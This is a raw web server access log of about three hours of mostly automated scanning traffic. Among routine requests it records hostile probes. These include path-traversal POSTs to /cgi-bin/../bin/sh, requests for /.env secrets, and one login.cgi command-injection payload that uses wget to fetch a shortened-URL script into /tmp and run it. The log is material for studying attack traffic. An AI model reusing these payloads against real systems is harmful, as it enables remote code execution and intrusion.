45.148.10.247 - - [05/Sep/2024:03:48:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.191.126.213 - - [05/Sep/2024:03:50:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:03:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [05/Sep/2024:03:53:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:03:55:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [05/Sep/2024:03:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [05/Sep/2024:03:56:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
107.151.182.54 - - [05/Sep/2024:03:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.47 - - [05/Sep/2024:03:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:08 +0200] "GET /console HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:26 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:26 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:27 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:44 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:59 +0200] "GET /aspera/faspex/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:03:59:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:00:00 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:00:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
8.222.175.173 - - [05/Sep/2024:04:00:28 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
95.214.55.138 - - [05/Sep/2024:04:00:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
107.151.182.54 - - [05/Sep/2024:04:00:33 +0200] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:00:49 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:00:49 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:00:49 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:07 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:08 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:08 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:08 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:09 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:09 +0200] "GET /WebInterface/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:27 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:01:46 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:02:04 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:02:19 +0200] "GET /identity HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:02:35 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:02:46 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.151.182.54 - - [05/Sep/2024:04:02:55 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [05/Sep/2024:04:05:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:04:06:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:04:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [05/Sep/2024:04:09:56 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
149.50.103.48 - - [05/Sep/2024:04:10:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
150.246.180.145 - - [05/Sep/2024:04:11:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20https://tinyurl.com/2rh4n7cf%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
80.82.77.202 - - [05/Sep/2024:04:12:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.224.128.187 - - [05/Sep/2024:04:16:20 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.187 - - [05/Sep/2024:04:16:30 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
45.156.128.43 - - [05/Sep/2024:04:16:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [05/Sep/2024:04:17:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:04:17:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.187 - - [05/Sep/2024:04:20:16 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.47 - - [05/Sep/2024:04:23:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.148.10.247 - - [05/Sep/2024:04:23:07 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
162.216.149.78 - - [05/Sep/2024:04:23:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.187 - - [05/Sep/2024:04:23:43 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
45.33.80.243 - - [05/Sep/2024:04:24:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.156.129.46 - - [05/Sep/2024:04:26:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.55.138 - - [05/Sep/2024:04:28:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [05/Sep/2024:04:30:52 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [05/Sep/2024:04:31:11 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
45.33.80.243 - - [05/Sep/2024:04:32:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
93.174.93.12 - - [05/Sep/2024:04:32:12 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.224.128.84 - - [05/Sep/2024:04:34:45 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [05/Sep/2024:04:36:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.168.172 - - [05/Sep/2024:04:41:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.148.10.247 - - [05/Sep/2024:04:43:08 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.191.126.213 - - [05/Sep/2024:04:43:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.249.4 - - [05/Sep/2024:04:44:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17"
91.92.249.4 - - [05/Sep/2024:04:44:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)"
185.191.126.213 - - [05/Sep/2024:04:44:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.1.113 - - [05/Sep/2024:04:44:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
64.62.197.160 - - [05/Sep/2024:04:44:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
67.227.173.42 - - [05/Sep/2024:04:45:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://ivre.rocks/"
47.88.93.234 - - [05/Sep/2024:04:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.251.11.3 - - [05/Sep/2024:04:46:50 +0200] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.94.161 - - [05/Sep/2024:04:46:50 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
64.62.197.163 - - [05/Sep/2024:04:47:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.197.165 - - [05/Sep/2024:04:47:41 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
65.49.1.109 - - [05/Sep/2024:04:47:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
65.49.1.114 - - [05/Sep/2024:04:48:32 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
91.92.249.4 - - [05/Sep/2024:04:51:51 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525"
91.92.249.4 - - [05/Sep/2024:04:52:21 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42"
91.92.249.4 - - [05/Sep/2024:04:52:29 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0"
91.92.249.4 - - [05/Sep/2024:04:52:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.143 Safari/537.36 Edg/100.0.1185.57"
91.92.249.4 - - [05/Sep/2024:04:53:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
91.92.249.4 - - [05/Sep/2024:04:53:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) konqueror/4.14.10 Safari/537.21"
91.92.249.4 - - [05/Sep/2024:04:53:58 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2"
185.191.126.213 - - [05/Sep/2024:04:54:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [05/Sep/2024:04:55:45 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
91.92.249.4 - - [05/Sep/2024:04:57:16 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)"
104.131.71.146 - - [05/Sep/2024:05:02:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
104.131.71.146 - - [05/Sep/2024:05:04:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
104.131.71.146 - - [05/Sep/2024:05:04:01 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.85/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
185.191.126.213 - - [05/Sep/2024:05:04:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.236.119.8 - - [05/Sep/2024:05:05:17 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.224.128.84 - - [05/Sep/2024:05:07:39 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.55.138 - - [05/Sep/2024:05:12:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.52 - - [05/Sep/2024:05:14:24 +0200] "GET /scada-vis HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.55.138 - - [05/Sep/2024:05:14:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.130.4 - - [05/Sep/2024:05:15:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.196.9.210 - - [05/Sep/2024:05:17:47 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
45.156.129.50 - - [05/Sep/2024:05:19:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.55.138 - - [05/Sep/2024:05:23:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [05/Sep/2024:05:24:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.238.181.71 - - [05/Sep/2024:05:24:45 +0200] "\x03" 501 316 "-" "-"
185.224.128.84 - - [05/Sep/2024:05:26:32 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.55.138 - - [05/Sep/2024:05:26:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [05/Sep/2024:05:28:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [05/Sep/2024:05:31:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.148.10.247 - - [05/Sep/2024:05:31:55 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.191.126.213 - - [05/Sep/2024:05:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [05/Sep/2024:05:33:48 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [05/Sep/2024:05:33:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:05:34:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:05:36:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [05/Sep/2024:05:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.148.10.247 - - [05/Sep/2024:05:48:31 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.191.126.213 - - [05/Sep/2024:05:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [05/Sep/2024:05:48:34 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [05/Sep/2024:05:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.52 - - [05/Sep/2024:05:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [05/Sep/2024:05:50:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [05/Sep/2024:05:50:16 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.219 - - [05/Sep/2024:05:50:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [05/Sep/2024:05:50:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [05/Sep/2024:05:50:20 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.191.126.213 - - [05/Sep/2024:05:50:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [05/Sep/2024:05:50:40 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
149.50.103.48 - - [05/Sep/2024:05:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [05/Sep/2024:05:53:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
45.148.10.247 - - [05/Sep/2024:05:54:22 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.224.128.59 - - [05/Sep/2024:05:54:43 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
45.148.10.247 - - [05/Sep/2024:05:56:25 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
149.50.103.48 - - [05/Sep/2024:05:58:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
5.196.102.73 - - [05/Sep/2024:06:00:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
95.214.55.138 - - [05/Sep/2024:06:01:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.202 - - [05/Sep/2024:06:01:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.202 - - [05/Sep/2024:06:01:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [05/Sep/2024:06:03:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.130.8 - - [05/Sep/2024:06:05:51 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
71.6.134.234 - - [05/Sep/2024:06:06:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.224.128.59 - - [05/Sep/2024:06:12:18 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
137.74.239.144 - - [05/Sep/2024:06:12:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
185.191.126.213 - - [05/Sep/2024:06:14:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [05/Sep/2024:06:16:35 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [05/Sep/2024:06:16:46 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
